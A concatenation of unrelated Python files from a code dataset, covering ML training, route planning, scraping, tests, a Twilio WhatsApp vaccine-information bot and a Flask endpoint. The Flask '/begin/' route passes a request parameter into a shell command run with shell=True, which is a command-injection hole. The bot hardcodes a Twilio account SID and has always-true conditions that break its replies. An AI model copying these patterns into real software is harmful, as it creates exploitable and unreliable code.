cfg = train.Config.from_json(train_cfg)
model_cfg = models.Config.from_json(model_cfg)
set_seeds(cfg.seed)
tokenizer = tokenization.FullTokenizer(vocab_file=vocab, do_lower_case=True)
pipeline = [Tokenizing(tokenizer.convert_to_unicode, tokenizer.tokenize),
AddSpecialTokensWithTruncation(max_len),
TokenIndexing(tokenizer.convert_tokens_to_ids,
('0', '1'), max_len)]
dataset = CsvDataset(pipeline)
# print(dataset[0])
# pdb.set_trace()
data_iter = DataLoader(dataset, batch_size=1, shuffle=True)
model = Classifier(model_cfg, 1)
criterion = nn.CrossEntropyLoss()
trainer = train.Trainer(cfg,
model,
data_iter,
optim.optim4GPU(cfg, model),
save_dir, get_device())
if mode == 'train':
def get_loss(model, batch, global_step): # make sure loss is a scalar tensor
# pdb.set_trace()
input_ids, segment_ids, input_mask, label_id = [b[0] for b in batch]
# pdb.set_trace()
logits = model(input_ids, segment_ids, input_mask)
# pdb.set_trace()
loss = neg_logloss(logits)
# loss = criterion(logits, label_id)
return loss
trainer.train(get_loss, model_file, pretrain_file, data_parallel)
elif mode == 'eval':
def evaluate(model, batch):
input_ids, segment_ids, input_mask, label_id = batch
logits = model(input_ids, segment_ids, input_mask)
_, label_pred = logits.max(1)
result = (label_pred == label_id).float() #.cpu().numpy()
accuracy = result.mean()
return accuracy, result
results = trainer.eval(evaluate, model_file, data_parallel)
total_accuracy = torch.cat(results).mean().item()
print('Accuracy:', total_accuracy)
if __name__ == '__main__':
fire.Fire(main)
| StarcoderdataPython |
3315192 | <reponame>ruizhang95/routeplanner
import numpy as np
import networkx as nx
from planner.dijkstra import Dijkstra
from utils.heuristic import heuristic2D
class BreadthFirst(Dijkstra):
def __init__(self, heuristic='octile', alpha=2):
"""
Params:
heuristic: {'manhattan', 'chebyshev', 'octile','euclidean','null'} (default: 'manhattan')
methods to compute heuristic.
alpha: a number in range of [0, 2] (default: 1)
if alpha is 0, it becomes best first search; if alpha is 1, it is A*;
if alpha is 2, it becomes dijkstra algorithm.
Warning: be really careful to select alpha, because it trades off between
accuracy and speed.
"""
super().__init__(heuristic=heuristic, alpha=alpha)
def _relax(self, u, v):
"""Perform edge relaxation.
Params:
u: a tuple representing the coordinates of the node u
v: a tuple representing the coordinates of the node v
"""
# g_val is the tentative actual distance from node v to source node via u.
g_val = self.nodes[u]['g'] + self.h(u, v)
# Relax node v from node u.
# update g_val
if g_val < self.nodes[v]['g']:
f_val = g_val
self.nodes[v]['g'] = g_val
self.nodes[v]['f'] = f_val
self.nodes[v]['parent'] = u
# if node is unvisited or is closed but can be accessed in a cheaper way,
# add to open priority queue.
if v not in self.open:
self.open.add(v, f_val)
| StarcoderdataPython |
1701268 | <gh_stars>1-10
import os
import pytesseract
from PIL import Image
import cv2
from plate import Segmentation
if __name__ == "__main__":
images = os.listdir('testData/')
print(images)
for image in images:
img_path = "./testData/{}".format(image)
if os.path.exists(os.path.join(os.getcwd(), "./output.png")):
os.system("rm ./output.png")
image = cv2.imread(img_path)
seg = Segmentation(image)
img = seg.plateSearch()
if img:
# text = pytesseract.image_to_string(Image.fromarray(img))
text = pytesseract.image_to_string(Image.open("./output.png"))
print(text)
else:
print("No number plate found") | StarcoderdataPython |
3234064 | #!/usr/bin/env python
from __future__ import print_function
import unittest
import rostest
import rospy
from rospy.service import ServiceException
from test_ros_services import assert_raises
from test_ros_services import call_service
TEST_NAME = 'test_remapping'
class Test(unittest.TestCase):
def test_remapping(self):
with assert_raises(ServiceException):
call_service('/capability_server/get_remappings', 'robot_base_pkg/FrontDistance')
call_service('/capability_server/start_capability', 'robot_base_pkg/FrontDistance', '')
resp = call_service('/capability_server/get_remappings', 'robot_base_pkg/FrontDistance')
assert len(resp.topics) == 1, resp
assert ('front/distance', 'robot/front/distance') in [(t.key, t.value) for t in resp.topics], resp
resp = call_service('/capability_server/get_remappings', 'robot_base_pkg/front_distance')
assert resp.topics, resp
assert ('front/distance', 'robot/front/distance') in [(t.key, t.value) for t in resp.topics], resp
resp = call_service('/capability_server/get_remappings', 'robot_base_pkg/Distance')
assert resp.topics, resp
assert ('distance', 'robot/front/distance') in [(t.key, t.value) for t in resp.topics], resp
if __name__ == '__main__':
rospy.init_node(TEST_NAME, anonymous=True)
rostest.unitrun('capabilities', TEST_NAME, Test)
| StarcoderdataPython |
3208061 | <reponame>Pandaaaa906/product_spider<gh_stars>0
from scrapy import Request
from product_spider.items import RawData
from product_spider.utils.spider_mixin import BaseSpider
class SynChemSpider(BaseSpider):
name = "synchem"
base_url = "https://www.synchem.de/"
start_urls = ["https://www.synchem.de/shop/", ]
def parse(self, response):
urls = response.xpath('//h4[@class="entry-title"]/a/@href').extract()
for url in urls:
yield Request(url, callback=self.parse_detail)
next_page = response.xpath('//a[@class="act"]/following-sibling::a[1]/@href').get()
if next_page:
yield Request(next_page, callback=self.parse)
def parse_detail(self, response):
d = {
"brand": "synchem",
"parent": ';'.join(response.xpath('//td[@class="product_categories"]//a/text()').getall()),
"cat_no": response.xpath('//td[@class="product_sku"]//text()').get(),
"en_name": response.xpath('//h1[@class="product_title entry-title"]/text()').get(),
"cas": response.xpath('//td[@class="td_value_CAS Number"]//text()').get(),
"mf": "".join(response.xpath('//td[@class="td_value_Molecular Formula"]//text()').getall()),
"mw": response.xpath('//td[@class="td_value_Molecular Weight"]//text()').get(),
"img_url": response.xpath('//figure//a/@href').get(),
"info1": str.strip(';'.join(response.xpath('//td[@class="td_value_Other Names"]//text()').getall())),
# "info2": strip(response.xpath(tmp2.format("Storage Conditions")).get()),
# "smiles": strip(response.xpath(tmp2.format("Smiles")).get()),
"prd_url": response.request.url,
"stock_info": str.strip(''.join(response.xpath('//p[@class="price"]//text()').getall())),
}
yield RawData(**d)
| StarcoderdataPython |
1699584 | """
This is a test of Pydantic's ability to parse recursive data.
In particular, I'm investigating how it might handle Amazon's state language.
For example, Choice states have very simple rules that might still be tough
to implement.
"""
import enum
import json
from typing import Dict, List, Optional
import pydantic
json_document = {
"StartAt": "State1",
"States": {
"State1": {
"Type": "Choice",
"Choices": [
{
"Next": "StateEnd",
"Variable": "$.key",
"StringEquals": "some-expected-value",
},
{
"Next": "StateEnd",
"Not": {
"Or": [
{
"Variable": "$.inconsistent",
"IsPresent": True,
},
{
"Variable": "$.inconsistent",
"StringNotEquals": "some-other-value",
},
],
},
},
],
},
"StateEnd": {
"Type": "Pass",
"End": True,
},
},
}
class Comparison(pydantic.BaseModel):
Variable: Optional[pydantic.constr(regex=r"\$\..+")]
StringEquals: Optional[pydantic.StrictStr]
StringNotEquals: Optional[pydantic.StrictStr]
IsPresent: Optional[pydantic.StrictBool]
Not: Optional['Comparison']
Or: Optional[List['Comparison']]
class TopComparison(Comparison):
# Only the top-level comparison can have a "Next" field.
Next: pydantic.StrictStr
class StateTypeEnum(str, enum.Enum):
Pass = "Pass"
Choice = "Choice"
class IndividualState(pydantic.BaseModel):
Type: StateTypeEnum
Choices: Optional[List[TopComparison]]
End: Optional[bool]
class StateLanguage(pydantic.BaseModel):
StartAt: pydantic.constr(strict=True, min_length=1, max_length=128)
States: Dict[str, IndividualState]
document = StateLanguage(**json_document)
assert json.loads(document.json(exclude_unset=True)) == json_document
# Conclusions thus far:
#
# * Recursion seems to work well.
# * I need to test validation for mutually-exclusive elements.
#
| StarcoderdataPython |
3262138 | # import aiosip
# import pytest
# import asyncio
# import itertools
#
#
# @pytest.mark.parametrize('close_order', itertools.permutations(('client', 'server', 'proxy'))) # noQa C901: too complex
# async def test_proxy_subscribe(test_server, test_proxy, protocol, loop, from_details, to_details, close_order):
# callback_complete = loop.create_future()
# callback_complete_proxy = loop.create_future()
#
# class ServerDialplan(aiosip.BaseDialplan):
#
# async def resolve(self, *args, **kwargs):
# await super().resolve(*args, **kwargs)
# return self.subscribe
#
# async def subscribe(self, request, message):
# await request.prepare(status_code=200)
# callback_complete.set_result(message)
#
# class ProxyDialplan(aiosip.BaseDialplan):
# async def resolve(self, *args, **kwargs):
# await super().resolve(*args, **kwargs)
#
# return self.proxy_subscribe
#
# async def proxy_subscribe(self, request, message):
# dialog = await request.proxy(message)
# callback_complete_proxy.set_result(message)
# async for message in dialog:
# dialog.proxy(message)
#
# app = aiosip.Application(loop=loop, debug=True)
#
# server_app = aiosip.Application(loop=loop, debug=True, dialplan=ServerDialplan())
# await test_server(server_app)
#
# proxy_app = aiosip.Application(loop=loop, dialplan=ProxyDialplan())
# proxy = await test_proxy(proxy_app)
#
# peer = await app.connect(
# protocol=protocol,
# remote_addr=(proxy.sip_config['server_host'], proxy.sip_config['server_port'])
# )
#
# await peer.subscribe(
# expires=1800,
# from_details=aiosip.Contact.from_header(from_details),
# to_details=aiosip.Contact.from_header(to_details),
# )
#
# received_request_server = await asyncio.wait_for(callback_complete, timeout=2)
# received_request_proxy = await asyncio.wait_for(callback_complete_proxy, timeout=2)
#
# assert received_request_server.method == 'SUBSCRIBE'
# assert received_request_server.payload == received_request_proxy.payload
# assert received_request_server.headers == received_request_proxy.headers
#
# for item in close_order:
# if item == 'client':
# await app.close()
# elif item == 'server':
# await server_app.close()
# elif item == 'proxy':
# await proxy_app.close()
# else:
# raise ValueError('Invalid close_order')
#
#
# @pytest.mark.parametrize('close_order', itertools.permutations(('client', 'server', 'proxy'))) # noQa C901: too complex
# async def test_proxy_notify(test_server, test_proxy, protocol, loop, from_details, to_details, close_order):
#
# callback_complete = loop.create_future()
# callback_complete_proxy = loop.create_future()
#
# class ServerDialpan(aiosip.BaseDialplan):
#
# async def resolve(self, *args, **kwargs):
# await super().resolve(*args, **kwargs)
#
# return self.subscribe
#
# async def subscribe(self, request, message):
# dialog = await request.prepare(status_code=200)
# await asyncio.sleep(0.2)
# await dialog.notify(payload='1')
#
# class ProxyDialplan(aiosip.BaseDialplan):
# async def resolve(self, *args, **kwargs):
# await super().resolve(*args, **kwargs)
#
# return self.proxy_subscribe
#
# async def proxy_subscribe(self, request, message):
# dialog = await request.proxy(message)
#
# async for message in dialog:
# dialog.proxy(message)
#
# if message.method == 'NOTIFY':
# callback_complete_proxy.set_result(message)
#
# app = aiosip.Application(loop=loop, debug=True)
#
# server_app = aiosip.Application(loop=loop, debug=True, dialplan=ServerDialpan())
# await test_server(server_app)
#
# proxy_app = aiosip.Application(loop=loop, debug=True, dialplan=ProxyDialplan())
# proxy = await test_proxy(proxy_app)
#
# peer = await app.connect(
# protocol=protocol,
# remote_addr=(proxy.sip_config['server_host'], proxy.sip_config['server_port'])
# )
#
# subscription = await peer.subscribe(
# expires=1800,
# from_details=aiosip.Contact.from_header(from_details),
# to_details=aiosip.Contact.from_header(to_details)
# )
#
# async for msg in subscription:
# await subscription.reply(msg, 200)
# callback_complete.set_result(msg)
# break # We only expect a single message
#
# received_notify_server = await asyncio.wait_for(callback_complete, timeout=2)
# received_notify_proxy = await asyncio.wait_for(callback_complete_proxy, timeout=2)
#
# assert received_notify_server.method == 'NOTIFY'
# assert received_notify_server.payload == '1'
#
# assert received_notify_server.payload == received_notify_proxy.payload
# assert received_notify_server.headers == received_notify_proxy.headers
#
# for item in close_order:
# if item == 'client':
# await app.close()
# elif item == 'server':
# await server_app.close()
# elif item == 'proxy':
# await proxy_app.close()
# else:
# raise ValueError('Invalid close_order')
| StarcoderdataPython |
54217 | <gh_stars>1-10
import logging
import re
log = logging.getLogger(__name__)
ALL_PAT = [
"^fc\d+\/\d+\s+(?P<sfp_present>.*)",
"Name is (?P<name>\S+)",
"Manufacturer's part number is (?P<part_number>\S+)",
"Cisco extended id is (?P<cisco_id>.*)",
"Cisco part number is (?P<cisco_part_number>\S+)",
"Cisco pid is (?P<cisco_product_id>\S+)",
"Nominal bit rate is (?P<bit_rate>\d+)",
"Min speed:\s+(?P<min_speed>\d+)\s+Mb/s,\s+Max speed:\s+(?P<max_speed>\d+)",
"Temperature\s+(?P<temperature>\S+ C)",
"Voltage\s+(?P<voltage>\S+ V)",
"Current\s+(?P<current>\S+ mA)",
"Tx Power\s+(?P<tx_power>\S+ dBm)",
"Rx Power\s+(?P<rx_power>\S+ dBm)",
]
class ShowInterfaceTransceiverDetail(object):
def __init__(self, outlines, vsan_id=None):
self._group_dict = {}
self.process_all(outlines)
log.debug(self._group_dict)
def process_all(self, outlines):
for eachline in outlines:
eachline = eachline.strip()
for eachpat in ALL_PAT:
match = re.search(eachpat, eachline)
if match:
self._group_dict = {**self._group_dict, **match.groupdict()}
break
@property
def sfp_present(self):
sfp = self._group_dict.get("sfp_present", None)
if sfp is None:
return None
return "sfp is present" in sfp
@property
def name(self):
return self._group_dict.get("name", None)
@property
def part_number(self):
return self._group_dict.get("part_number", None)
@property
def cisco_id(self):
return self._group_dict.get("cisco_id", None)
@property
def cisco_part_number(self):
return self._group_dict.get("cisco_part_number", None)
@property
def cisco_product_id(self):
return self._group_dict.get("cisco_product_id", None)
@property
def bit_rate(self):
bit_rate = self._group_dict.get("bit_rate", None)
if bit_rate is not None:
return int(bit_rate)
return None
@property
def min_speed(self):
return self._group_dict.get("min_speed", None)
@property
def max_speed(self):
return self._group_dict.get("max_speed", None)
@property
def temperature(self):
return self._group_dict.get("temperature", None)
@property
def voltage(self):
return self._group_dict.get("voltage", None)
@property
def current(self):
return self._group_dict.get("current", None)
@property
def tx_power(self):
return self._group_dict.get("tx_power", None)
@property
def rx_power(self):
return self._group_dict.get("rx_power", None)
| StarcoderdataPython |
180355 | <reponame>malonedon/whatsaap-bot<filename>bot.py
import os
from dotenv import load_dotenv
from flask import Flask, request
from twilio.twiml.messaging_response import MessagingResponse
from twilio.rest import Client
import time
date_time=time.localtime()
year=date_time[0]
month=date_time[1]
day=date_time[2]
time=str(date_time[3])+":"+str(date_time[4])
load_dotenv()
app = Flask(__name__)
TWILIO_SID = "ACaffe33385ebba23a9fb41bd774e87d2e"
TWILIO_AUTHTOKEN = "<PASSWORD>"
client = Client(TWILIO_SID,TWILIO_AUTHTOKEN)
def respond(message):
response = MessagingResponse()
response.message(message)
return str(response)
@app.route('/message', methods=['POST'])
def reply():
message = request.form.get('Body').lower()
if message == "link":
return respond(f"https://console.twilio.com/us1/billing/manage-billing/upgrade?frameUrl=%2Fconsole%2Fbilling%2Fupgrade%3F__override_layout__%3Dembed%26bifrost%3Dtrue%26x-target-region%3Dus1")
if message == "hy" or "hi" or "hello":
return respond(f"Welcome to the official Ministry of Health and Child Care Zimbabwe Typhoid Conjugate Vaccine support service\n"+str(day)+" "+str(month)+" "+str(year)+" "+str(time)+"\nThe right infomation is important.This service provides infomation on the typhoid conjugate vaccination campaign\nWhat would you like to know typhoid vaccinnation?.\nReply with a key word in bold to get the infomation you need\n vaccine\n child details\n vaccination centers \n symptoms \n basic infomation \n Wellness tips \n Covid19 \n Share this service.." )
if message == "what is typhoid" or "typhoid":
return respond(f"typhoid fever is a life threatning infection caused by the bacteriumsalmonella typhi.It is ussually spread through contanimated food or water.")
header="Welcome to the official Ministry of Health and Child Care Zimbabwe Typhoid Conjugate Vaccine support service\n"
date="+str(day)+" "+str(month)+" "+str(year)+" "+str(time)\n"
header2="The right infomation is important.This service provides infomation on the typhoid conjugate vaccination campaign\n"
question="What would you like to know about typhoid vaccinnation?.\n Reply with a key word in bold to get the infomation you need\n"
basic_infomation=header+header2+date
if message == "vaccine\n":
return respond("""1.Vaccines are safe and effective-Any licenced vaccine is rigously tested before it is approved for use
\n-It is reguraly reassed
\n-it is also monitored for side effects
\n2. Vaccines prevent deadly illnesses
\n-Vaccines protect children from diseases like measles(gwirikwiti
\n-polio
\n3.Vaccines provide better immunity than natural infections:
\n-the immune response to vaccines is similar to the one produced by natuarl infections but is less risky
\n4.Combined vaccines are safe and beneficial
\n-Giving several vaccines at the same time has no effects on the childs health
\n5. If we stop vaccination with better hygiene,diseases will return.
\nwhen people are not vaccinated,infectious diseases that have become uncommon will quickly reappear.
""")
if message == "symptoms":
return respond(f"common signs and symptoms include\n persistent high fever\n sweeting \n headache \n abdominal discomfort \n loss of appetite \n diarrhea or constipation \n nausea \n general body weakeness \n if untreated typhoid can result life threatening intestinal bleeding and perfoation,hepatitis,mental problems and infections of the lungs and heart")
if message == "vaccination centers":
return respond(".......................................................")
if message == "Hygine tips":
return respond("wash your hands throughly with soup and running water\nTry to eat your whilst its hot\n")
if message == "covid19":
return respond("Contact this number for mor infomation on Covid19 0714734593")
if message == "share_this_service":
return respond("For all who want to know about Typhoid vaccination")
if message == "what is typhoid vaccination" or "vaccination" or "immunisation":
return respond(f"typhoid vaccination is vaccination against typhoid.it is given to prevent your child from typhoid in case/in cases where the child is exposed to contamneted food or water.")
if message == "where can i get vaccinated" or "where can i get treated" or "treated":
return respond(f"At any clinic or hospital near you.Where do you stay ?.")
if message == "Vaccination is for what age" or "age of vaccination" or "age":
return respond(f"it is for children aged between 9 months and below 15 years")
if message == "what are the benefits of vaccination":
return respond(f"your child is protected in the event of a typhoid outbreak")
if message == "what are the side effects of this vaccine" or "effects of vaccine" or "effects":
return respond(f"visit your nearest clinic or hospital for checkup if you suspect any side effects")
if message == "how long does the vaccine last" or "vaccine duration":
return respond(f"visit your nearest clinic or hospital for vaccine duration they will assist and give you more infomation")
if message == "if i have been vaccinated before when do i need to get vaccinated again" or "when do i get vaccinated":
return respond(f"You will be notified by the ministry of health and child care,or at your nearest clinic.")
if message == "Are there any effects of being vaccinated twice" or "effects of being vaccinated":
return respond(f"No but you should only be vacinated once.")
if message == "what are the symptoms of typhoid fever" or "symptoms":
return respond(f"common signs and symptoms include\n persistent high fever\n sweeting \n headache \n abdominal discomfort \n loss of appetite \n diarrhea or constipation \n nausea \n general body weakeness \n if untreated typhoid can result life threatening intestinal bleeding and perfoation,hepatitis,mental problems and infections of the lungs and heart")
if message == "how is the vaccine administered" or "administered":
return respond(f"it is administerd by injection into the left thigh for children under five years and left upper arm for children above five years.")
if message == "what else do i need to do after vaccination" or "after vaccination":
return respond(f"Remember after vaccination against typhoid it remains important to mantain good personal and food hygene by drinking boiled or treated water,washing hands with soup before eating and after using the toilet,eating food whilst hot and getting early treatment if you or family member is sick")
if message == "i have been vaccinated for covid19 do i need to be vaccinated for typhoid" or "do i need to be vaccinated":
return respond(f"Yes you need to be vaccinated")
if message == "will the covid19 vaccine affect typhoid vaccine":
return respond(f"No it does not")
if message == "where can i get more infomation on vaccines" or "more infomation":
return respond(f"At your nearest clinic or call the ministry of health toll free number 2019,393")
if __name__=="__main__":
app.run()
| StarcoderdataPython |
4824496 | <reponame>saifuddin779/data-collector
import sys, os, ast, json, requests
from subprocess import call, Popen, PIPE, STDOUT
from flask import Flask, render_template, request
app = Flask(__name__)
app.debug = True
@app.route('/')
def index():
return 'index page'
@app.route('/begin/')
def begin():
index = int(request.args['index'])
country_code = request.args['country_code'].encode('utf-8')
command = "tmux send -t scrap_session.0 'python parse_profiles.py %s prod %d' ENTER" % (country_code, index)
p = Popen(command, shell=True, stdout=PIPE, stderr=STDOUT, bufsize=1, close_fds=True)
return {'status': True}
if __name__ == '__main__':
app.run(host='0.0.0.0')
| StarcoderdataPython |
3245560 | <filename>backend/app/main.py
import os
import uvicorn
from fastapi import FastAPI
from fastapi.staticfiles import StaticFiles
from starlette.middleware.cors import CORSMiddleware
from app.api.router import api_router
from app.core.config import settings
from app.core.logging import setup_logging
from app.middleware.logger import LoggerMiddleware
from app.utils.package_info import get_metadata
prefix = settings.BASE_PREFIX
app = FastAPI(
**get_metadata(),
openapi_url=f"{prefix}/openapi.json",
docs_url=f"{prefix}/docs",
redoc_url=f"{prefix}/redoc",
root_path=os.environ.get("ROOT_PATH", ""),
)
logger = setup_logging()
app.middleware("http")(LoggerMiddleware(logger=logger))
# Set all CORS enabled origins
if settings.BACKEND_CORS_ORIGINS:
app.add_middleware(
CORSMiddleware,
allow_origins=[str(origin) for origin in settings.BACKEND_CORS_ORIGINS],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
app.include_router(api_router, prefix=prefix)
# Находится не в роутере картинок из-за https://github.com/tiangolo/fastapi/issues/1469
app.mount(f"{prefix}/images", StaticFiles(directory=settings.IMAGE_DIR), name="images")
if __name__ == "__main__":
uvicorn.run("main:app", host="0.0.0.0", reload=True, port=8888)
| StarcoderdataPython |
3259511 | """nestedcaller.py - A high-order function to call nested multiple functions.
Fast & Picklable.
"""
__all__ = ['nestedcaller']
class nestedcaller:
__slots__ = '_funcs',
def __new__(cls, *args):
assert type(args) is tuple
if not all(map(callable, args)):
raise TypeError('not callable')
self = super(nestedcaller, cls).__new__(cls)
a = []
for func in args:
if cls != nestedcaller or type(func) != nestedcaller:
a.append(func)
else:
a.extend(func.funcs)
self._funcs = tuple(a)
return self
@property
def funcs(self):
return self._funcs
def __reduce__(self):
return type(self), self._funcs
def __call__(self, x):
from functools import reduce
return reduce(lambda x, f: f(x), self._funcs, x)
def __repr__(self):
return '%s.%s(%s)' % (
__name__, type(self).__qualname__,
', '.join(map(repr, self._funcs)))
try:
# raise ImportError() # for debug
from _nestedcaller import nestedcaller
except ImportError:
from warnings import warn
warn('import native version of nestedcaller module has failed. using python version')
| StarcoderdataPython |
1769909 | color_list_1 = set(["White", "Black", "Red"])
color_list_2 = set(["Red", "Green"])
a = color_list_1 - color_list_2
print(a) | StarcoderdataPython |
1780186 | #!/usr/bin/env python3
import re
import subprocess
import sys
_LENGTH = 20
try:
action = sys.argv[1]
except:
action = None
if action == "+":
subprocess.call(["xbacklight", "-inc", "10"])
elif action == "-":
subprocess.call(["xbacklight", "-dec", "10"])
brightre = re.compile(r"(\d+)")
ret = subprocess.check_output(["xbacklight"]).decode()
m = brightre.search(ret)
if m is not None:
brightness = int(m.group(1))
summary = "<b>Brightness [{}%]</b>\n".format(brightness)
ticks = int(brightness / 100.0 * _LENGTH)
body = "█" * ticks
body += "▁" * (_LENGTH - ticks)
subprocess.call(["notify-send", "-u", "low", "DUNST_COMMAND_REPLACE" + summary + body]) | StarcoderdataPython |
134488 | <filename>config.py
import configparser
from sqlalchemy import create_engine
config = configparser.ConfigParser()
config.read('config.txt')
engine = create_engine(config.get('database', 'con')) | StarcoderdataPython |
96340 | # Copyright (c) 2017 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
"""
Guidelines for writing new hacking checks
- Use only for Omni-specific tests. OpenStack general tests
should be submitted to the common 'hacking' module.
- Pick numbers in the range O3xx. Find the current test with
the highest allocated number and then pick the next value.
If nova has an N3xx code for that test, use the same number.
- Keep the test method code in the source file ordered based
on the O3xx value.
- List the new rule in the top level HACKING.rst file
- Add test cases for each new rule to omnitests/test_hacking.py
"""
asse_trueinst_re = re.compile(
r"(.)*assertTrue\(isinstance\((\w|\.|\'|\"|\[|\])+, "
"(\w|\.|\'|\"|\[|\])+\)\)")
def assert_true_instance(logical_line):
"""Check for assertTrue(isinstance(a, b)) sentences
O316
"""
if asse_trueinst_re.match(logical_line):
yield (0, "O316: assertTrue(isinstance(a, b)) sentences not allowed")
def factory(register):
register(assert_true_instance)
| StarcoderdataPython |
1795003 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['TransformArgs', 'Transform']
@pulumi.input_type
class TransformArgs:
def __init__(__self__, *,
media_services_account_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
outputs: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]] = None):
"""
The set of arguments for constructing a Transform resource.
:param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
:param pulumi.Input[str] description: An optional verbose description of the Transform.
:param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created.
:param pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined.
"""
pulumi.set(__self__, "media_services_account_name", media_services_account_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if outputs is not None:
pulumi.set(__self__, "outputs", outputs)
@property
@pulumi.getter(name="mediaServicesAccountName")
def media_services_account_name(self) -> pulumi.Input[str]:
"""
The Media Services account name. Changing this forces a new Transform to be created.
"""
return pulumi.get(self, "media_services_account_name")
@media_services_account_name.setter
def media_services_account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "media_services_account_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional verbose description of the Transform.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this Transform. Changing this forces a new Transform to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def outputs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]:
"""
One or more `output` blocks as defined below. At least one `output` must be defined.
"""
return pulumi.get(self, "outputs")
@outputs.setter
def outputs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]):
pulumi.set(self, "outputs", value)
@pulumi.input_type
class _TransformState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
media_services_account_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
outputs: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Transform resources.
:param pulumi.Input[str] description: An optional verbose description of the Transform.
:param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created.
:param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created.
:param pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if media_services_account_name is not None:
pulumi.set(__self__, "media_services_account_name", media_services_account_name)
if name is not None:
pulumi.set(__self__, "name", name)
if outputs is not None:
pulumi.set(__self__, "outputs", outputs)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional verbose description of the Transform.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="mediaServicesAccountName")
def media_services_account_name(self) -> Optional[pulumi.Input[str]]:
"""
The Media Services account name. Changing this forces a new Transform to be created.
"""
return pulumi.get(self, "media_services_account_name")
@media_services_account_name.setter
def media_services_account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "media_services_account_name", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this Transform. Changing this forces a new Transform to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def outputs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]:
"""
One or more `output` blocks as defined below. At least one `output` must be defined.
"""
return pulumi.get(self, "outputs")
@outputs.setter
def outputs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]):
pulumi.set(self, "outputs", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
class Transform(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
media_services_account_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Transform.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_account = azure.storage.Account("exampleAccount",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
account_tier="Standard",
account_replication_type="GRS")
example_service_account = azure.media.ServiceAccount("exampleServiceAccount",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
